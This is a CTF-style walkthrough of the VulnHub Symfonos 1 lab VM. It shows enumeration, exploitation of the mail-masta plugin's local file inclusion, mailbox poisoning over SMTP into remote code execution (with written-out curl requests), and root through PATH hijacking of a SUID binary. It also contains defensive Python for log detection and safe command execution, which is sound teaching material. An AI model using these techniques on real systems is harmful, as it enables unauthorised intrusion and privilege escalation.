SYMFONOS 1 Walkthrough — VulnHub — Story of a Shimmering God with Bad Habits — OSCP Practice

Symfonos 1 is the first machine in a group of OSCP-like VMs listed in the NetSecFocus doc. In this writeup we will practice gaining a foothold through SMTP and then escalating privileges to root with PATH injection. Symfonos 1 is a fun VM based on real-life situations, and one can learn a lot from it by digging deep enough!

Preparation

  1. Download Symfonos 1 from VulnHub and boot it up in VMware or VirtualBox
  2. Your favorite haxor env; in this article I am using a Kali VM
  3. Find the IP address of the target VM; one way to do it is with nmap:
nmap -sn 172.16.30.0/24

In this case the target's IP is 172.16.30.4

Tools

  • nmap
  • gobuster
  • smbclient
  • wpscan
  • nc
  • strings

Topics

  • LFI (Local File Inclusion)
  • SMTP (25) mail (log) poisoning following LFI
  • SUID binary
  • $PATH exploitation following SUID binary

Enumeration

# Nmap 7.91 scan initiated Sat Feb 13 02:35:30 2021 as: nmap -p- -sC -sV -T4 -v -o tcp.nmap 172.16.30.4
Nmap scan report for 172.16.30.4
Host is up (0.0019s latency).
Not shown: 65530 closed ports
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.4p1 Debian 10+deb9u6 (protocol 2.0)
| ssh-hostkey:
| 2048 ab:5b:45:a7:05:47:a5:04:45:ca:6f:18:bd:18:03:c2 (RSA)
| 256 a0:5f:40:0a:0a:1f:68:35:3e:f4:54:07:61:9f:c6:4a (ECDSA)
|_ 256 bc:31:f5:40:bc:08:58:4b:fb:66:17:ff:84:12:ac:1d (ED25519)
25/tcp open smtp Postfix smtpd
|_smtp-commands: symfonos.localdomain, PIPELINING, SIZE 10240000, VRFY, ETRN, STARTTLS, ENHANCEDSTATUSCODES, 8BITMIME, DSN, SMTPUTF8,
| ssl-cert: Subject: commonName=symfonos
| Subject Alternative Name: DNS:symfonos
| Issuer: commonName=symfonos
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2019-06-29T00:29:42
| Not valid after: 2029-06-26T00:29:42
| MD5: 086e c75b c397 34d6 6293 70cd 6a76 c4f2
|_SHA-1: e3dc 7293 d59b 3444 d39a 41ef 6fc7 2006 bde4 825f
|_ssl-date: TLS randomness does not represent time
80/tcp open http Apache httpd 2.4.25 ((Debian))
| http-methods:
|_ Supported Methods: HEAD GET POST OPTIONS
|_http-server-header: Apache/2.4.25 (Debian)
|_http-title: Site doesn't have a title (text/html).
139/tcp open netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
445/tcp open netbios-ssn Samba smbd 4.5.16-Debian (workgroup: WORKGROUP)
Service Info: Hosts: symfonos.localdomain, SYMFONOS; OS: Linux; CPE: cpe:/o:linux:linux_kernel

Host script results:
|_clock-skew: mean: 1h59m59s, deviation: 3h27m50s, median: 0s
| nbstat: NetBIOS name: SYMFONOS, NetBIOS user: <unknown>, NetBIOS MAC: <unknown> (unknown)
| Names:
| SYMFONOS<00> Flags: <unique><active>
| SYMFONOS<03> Flags: <unique><active>
| SYMFONOS<20> Flags: <unique><active>
| \x01\x02__MSBROWSE__\x02<01> Flags: <group><active>
| WORKGROUP<00> Flags: <group><active>
| WORKGROUP<1d> Flags: <unique><active>
|_ WORKGROUP<1e> Flags: <group><active>
| smb-os-discovery:
| OS: Windows 6.1 (Samba 4.5.16-Debian)
| Computer name: symfonos
| NetBIOS computer name: SYMFONOS\x00
| Domain name: \x00
| FQDN: symfonos
|_ System time: 2021-02-12T18:35:46-06:00
| smb-security-mode:
| account_used: guest
| authentication_level: user
| challenge_response: supported
|_ message_signing: disabled (dangerous, but default)
| smb2-security-mode:
| 2.02:
|_ Message signing enabled but not required
| smb2-time:
| date: 2021-02-13T00:35:46
|_ start_date: N/A

Read data files from: /usr/bin/../share/nmap
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Sat Feb 13 02:35:46 2021 -- 1 IP address (1 host up) scanned in 15.92 seconds
  • Port 22 is open, so we can SSH in when the time comes!
  • Port 25 (SMTP) is open, running a Postfix mail server that sends email!
  • Port 80 is open; will check it with a browser
  • Ports 139 and 445 are open for Samba

Port 80 returns a picture and some CSS

Running gobuster

gobuster dir -u http://symfonos.local/ -w /usr/share/seclists/Discovery/Web-Content/common.txt -z -k -l -x "txt,html,php" -o gobuster

Nothing interesting

Enumerating SMB gives us an anonymous account and another account called helios

Anonymous has a txt file giving us some passwords (epidioko, qwerty, baseball) to try

smbclient -L \\\\172.16.30.4\\
smbclient \\\\172.16.30.4\\anonymous

After trying to log in to SMB as the helios user with those passwords, qwerty worked and two files were available!

The third todo is to work on /h3l105, such a 1337 l0c4t10n :) Trying it in the browser!
It's a WordPress site; we need to add symfonos.local to the hosts file to see it correctly.

Binwalk-ed both images, from the index page and from WordPress, and found nothing. Hiding data in images is not really a real-world pentesting situation and more of a CTF competition thing, but it's done just to leave no stone unturned!

Running WPscan

wpscan --url http://symfonos.local/h3l105 -o wpscan

wpscan needs an API token to show us the vulnerabilities related to its findings, but I just googled the WordPress version and the plugins it found

There are a bunch of vulns for WordPress 5.2.2, but some of them are authenticated, which is not interesting right now. There is, however, an old discontinued WordPress plugin called mail-masta that has LFI and SQL injection issues

https://wpscan.com/vulnerability/5136d5cf-43c7-4d09-bf14-75ff8b77bb44
https://wpscan.com/vulnerability/c992d921-4f5a-403a-9482-3131c69e383a

So the LFI is working on passwd

At this point I tried to fetch some sensitive files with the LFI, like WordPress configs and logs, but failed. It felt like a dead end, so I ended up searching for ways to escalate LFI to RCE

So we can get RCE through log files, through mail, and in many other ways

It's not possible to read /var/log/mail, but after searching I found that Postfix saves a user's emails at /var/mail/[USER]

And it works: the mails for the helios user come back

curl http://symfonos.local/h3l105/wp-content/plugins/mail-masta/inc/campaign/count_of_send.php\?pl\=/var/mail/helios

There are a couple of emails in there too, so if we inject PHP code into the mailbox (poisoning) and then include it from the web, the vulnerable PHP file will execute it

Now, how do we send an email to the open SMTP (25) port? For that we need an existing email address on that mail server, and we have one: it's the username, helios

Read more about working with the SMTP port here, here and here.

I wrote From and To in the DATA section too. It's not necessary in this case, but it's good practice to keep it low-profile and normal-looking in general!

nc is available on the server, so I just used it to get a shell

curl http://symfonos.local/h3l105/wp-content/plugins/mail-masta/inc/campaign/count_of_send.php\?pl\=/var/mail/helios\&cmd\=ls
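The two server-side artefacts this chain leaves behind are the LFI requests in the Apache access log and the PHP code sitting in the helios mailbox, so here is what detecting both looks like. This is an added example, not code from the original post or from the plugin; the access-log lines and the mbox content are constructed for illustration, the `cmd` parameter name is taken from the request above, and the detector is scoped to the `count_of_send.php` endpoint the writeup documents.

```python
"""Detection for the two web-side artefacts this walkthrough leaves behind: LFI
requests against mail-masta's count_of_send.php in the Apache access log, and
PHP code planted in a Postfix mailbox. Added example, not part of the original
post; every log line and the mailbox below are constructed for illustration."""
import re
from urllib.parse import urlparse, parse_qs

# Apache "combined" log line: only the request line and status are needed here.
ACCESS_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+) \S+" (?P<status>\d{3})'
)
VULN_ENDPOINT = "/mail-masta/inc/campaign/count_of_send.php"
# Query parameter the plugin hands straight to include(); a path here is LFI.
INCLUDE_PARAMS = ("pl",)
# Parameter the poisoned include is driven with in this writeup; its presence on
# the vulnerable endpoint is worth an alert on its own.
COMMAND_PARAMS = ("cmd",)
PHP_TAG_RE = re.compile(r"<\?(?:php\b|=)", re.IGNORECASE)


def classify_request(line):
    """Return the findings for one access-log line; [] means nothing to report."""
    m = ACCESS_RE.match(line)
    if not m:
        return []
    url = urlparse(m.group("target"))
    if not url.path.endswith(VULN_ENDPOINT):
        return []
    params = parse_qs(url.query, keep_blank_values=True)  # percent-decodes values
    findings = []
    for name in INCLUDE_PARAMS:
        for value in params.get(name, []):
            # absolute path, traversal, or a stream wrapper such as php://
            if value.startswith("/") or "../" in value or "://" in value:
                findings.append(f"lfi:{name}={value}")
    for name in COMMAND_PARAMS:
        if name in params:
            findings.append(f"cmd-param:{name}")
    return findings


def scan_access_log(text):
    """Map 1-based line numbers to findings for every line that has any."""
    report = {}
    for number, line in enumerate(text.splitlines(), 1):
        findings = classify_request(line)
        if findings:
            report[number] = findings
    return report


def find_php_in_mbox(text):
    """Return (message number, envelope sender) for each message in an mbox spool
    such as /var/mail/helios that contains a PHP open tag anywhere. Messages are
    delimited by the 'From ' envelope line at column 0 ('From:' headers do not
    match because of the colon)."""
    hits = []
    for number, message in enumerate(re.split(r"(?m)^From ", text)[1:], 1):
        if PHP_TAG_RE.search(message):
            hits.append((number, message.split(None, 1)[0]))
    return hits


# Constructed sample data: one benign page view, three attack requests, and one
# request to the endpoint with a plain relative name that the rules do not flag.
ACCESS_LOG = """\
10.0.0.5 - - [13/Feb/2021:02:40:01 -0600] "GET /h3l105/ HTTP/1.1" 200 4213
10.0.0.5 - - [13/Feb/2021:02:41:10 -0600] "GET /h3l105/wp-content/plugins/mail-masta/inc/campaign/count_of_send.php?pl=/etc/passwd HTTP/1.1" 200 1532
10.0.0.5 - - [13/Feb/2021:02:45:33 -0600] "GET /h3l105/wp-content/plugins/mail-masta/inc/campaign/count_of_send.php?pl=/var/mail/helios&cmd=id HTTP/1.1" 200 2201
10.0.0.5 - - [13/Feb/2021:02:46:00 -0600] "GET /h3l105/wp-content/plugins/mail-masta/inc/campaign/count_of_send.php?pl=..%2F..%2F..%2Fetc%2Fhosts HTTP/1.1" 200 300
10.0.0.5 - - [13/Feb/2021:02:47:12 -0600] "GET /h3l105/wp-content/plugins/mail-masta/inc/campaign/count_of_send.php?pl=campaign.php HTTP/1.1" 200 300
"""

# Constructed mbox: a normal message followed by one carrying a harmless PHP marker.
MAILBOX = """\
From root@symfonos.localdomain Sat Feb 13 02:20:00 2021
From: root@symfonos.localdomain
To: helios@symfonos.localdomain
Subject: Welcome

Hi Helios, the web server is up.

From nobody@example.invalid Sat Feb 13 02:50:11 2021
From: nobody@example.invalid
To: helios@symfonos.localdomain
Subject: hi

<?php echo 'planted marker'; ?>
"""

if __name__ == "__main__":
    for number, findings in scan_access_log(ACCESS_LOG).items():
        print(f"access log line {number}: {', '.join(findings)}")
    for number, sender in find_php_in_mbox(MAILBOX):
        print(f"mailbox message {number} from {sender} contains a PHP tag")
```

Run it over a real access log and spool by passing their contents to `scan_access_log` and `find_php_in_mbox`. The mailbox check is the more durable signal: a legitimate message to a Unix account has no reason to contain `<?php`, whereas the access-log rules only cover the one plugin endpoint and would need the same treatment for any other include-style parameter on the site.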

The shell runs as the helios account. After upgrading the shell I did some enumeration with lse.sh, and there is a binary at /opt/statuscheck with the SUID bit set.

After running it, it seems to be running curl to check the status of the web server (the date in the output is current). The first thing to do when analysing a static binary is to pass it through the strings command!

Our guess was right: it seems to be running curl against localhost.
A coding lesson here is that when you need to call a system command, use its absolute path. Here curl is not called by the absolute path of its binary, /usr/bin/curl, but just as curl, so Linux looks the binary up through the directories in the $PATH environment variable.

Let's escalate privileges using $PATH by creating a fake curl in /tmp and putting /tmp in $PATH, so the binary runs our fake instead of the original curl

Notice the difference between uid and euid. Also notice that if we put /bin/bash in our new curl it returns a shell as the normal user, not root, but it returns root with /bin/sh; it may be because of how the SUID file /opt/statuscheck is programmed to use /bin/sh

  • read more about uid and euid here
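To make the lesson concrete, the following shows how a bare command name is resolved through $PATH and what the pinned, fixed-environment alternative looks like for a privileged helper. This is an added example and not the original /opt/statuscheck binary (whose source the post could not locate); the temporary directory, the script named `curl` inside it, the `SAFE_ENV` contents and the name `no-such-symfonos-demo-tool` are all constructed for illustration.

```python
"""Why an unqualified command name in a privileged helper is a problem, and what
the pinned alternative looks like. Added example, not the original /opt/statuscheck
binary; the temporary directory, the fake 'curl' script and SAFE_ENV are
constructed for illustration."""
import os
import stat
import subprocess
import tempfile


def _is_executable_file(path):
    """Regular file with any execute bit set (mode bits only, so the result does
    not depend on how the filesystem is mounted)."""
    try:
        st = os.stat(path)
    except OSError:
        return False
    return stat.S_ISREG(st.st_mode) and bool(st.st_mode & (stat.S_IXUSR | stat.S_IXGRP | stat.S_IXOTH))


def resolve_like_execvp(name, path_env):
    """Walk the directories of path_env left to right, the way execvp(3) and
    /bin/sh do for a bare command name, and return the first executable match
    or None. A name containing '/' is never searched: it is used as given."""
    if "/" in name:
        return name if _is_executable_file(name) else None
    for directory in path_env.split(":"):
        candidate = os.path.join(directory or ".", name)  # empty entry means cwd
        if _is_executable_file(candidate):
            return candidate
    return None


# Environment handed to anything a privileged helper starts. The caller's own
# PATH (and the rest of its environment) is discarded, so nothing the caller
# prepended to PATH is ever consulted. Constructed value; adjust per system.
SAFE_ENV = {"PATH": "/usr/bin:/bin", "LANG": "C"}


def is_pinned_command(argv0):
    """True only for an absolute path: 'curl' is False, '/usr/bin/curl' is True."""
    return os.path.isabs(argv0)


def run_pinned(argv, env=SAFE_ENV):
    """Run argv with the fixed environment and return its exit status. Refuses
    bare names, so the command can never be redirected through PATH."""
    if not is_pinned_command(argv[0]):
        raise ValueError(f"refusing to search PATH for {argv[0]!r}; use an absolute path")
    return subprocess.run(argv, env=env, check=False).returncode


def demo():
    """Create a throwaway directory holding a script named 'curl', put it at the
    front of a PATH string, and compare the bare-name lookup with the pinned call."""
    with tempfile.TemporaryDirectory() as fake_dir:
        fake = os.path.join(fake_dir, "curl")
        with open(fake, "w") as f:
            f.write("#!/bin/sh\necho fake-curl\n")
        os.chmod(fake, stat.S_IRWXU)
        path_env = f"{fake_dir}:/usr/bin:/bin"
        try:
            run_pinned(["curl", "-I", "http://localhost"])
            rejected = False
        except ValueError:
            rejected = True
        return {
            # bare name: the first PATH entry wins, whatever it contains
            "bare_name_resolves_to_fake": resolve_like_execvp("curl", path_env) == fake,
            # the hardened runner never gets as far as a lookup
            "bare_name_rejected": rejected,
            # an absolute path is used as given and PATH plays no part; /bin/sh
            # is used here because it exists on every Linux system
            "absolute_path_runs": run_pinned(["/bin/sh", "-c", "exit 3"]) == 3,
        }


if __name__ == "__main__":
    print(demo())
```

The two halves of the fix belong together: an absolute path stops the lookup, and a fixed environment stops the caller from influencing anything else the child reads (`LD_PRELOAD` and friends are ignored for set-uid executables, but a plain `/bin/sh -c` child inherits whatever it is given). On the difference the post observed between the two shells, bash's own manual states that when it starts with an effective uid that differs from the real uid and is not given `-p`, it resets the effective uid to the real one, whereas Debian's `/bin/sh` (dash) has no such logic; that is general shell behaviour, not a confirmation of what /opt/statuscheck does.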

Post Exploitation

I looked around for the source of statuscheck but couldn't find it. It would be nice to confirm exactly why a root shell doesn't come back with /bin/bash; maybe I will update this later.

Also there is a flag in /root if interested :)

Helios made a few mistakes that let us pwn this machine. The obvious first one is the buggy WordPress plugin, and the one that gives us root is the use of curl without an absolute path. The lesson to learn here is that if you are using an external tool in your code, call it with an absolute path like /usr/bin/curl and not just curl.

Conclusion

Symfonos 1 was a fun VM and a good refresher on debugging mail and SMTP for me. I also learned a lot about the different ways to escalate LFI to RCE.

Hope you enjoyed it too!

Breaking stuff to learn them, learning stuff to break them!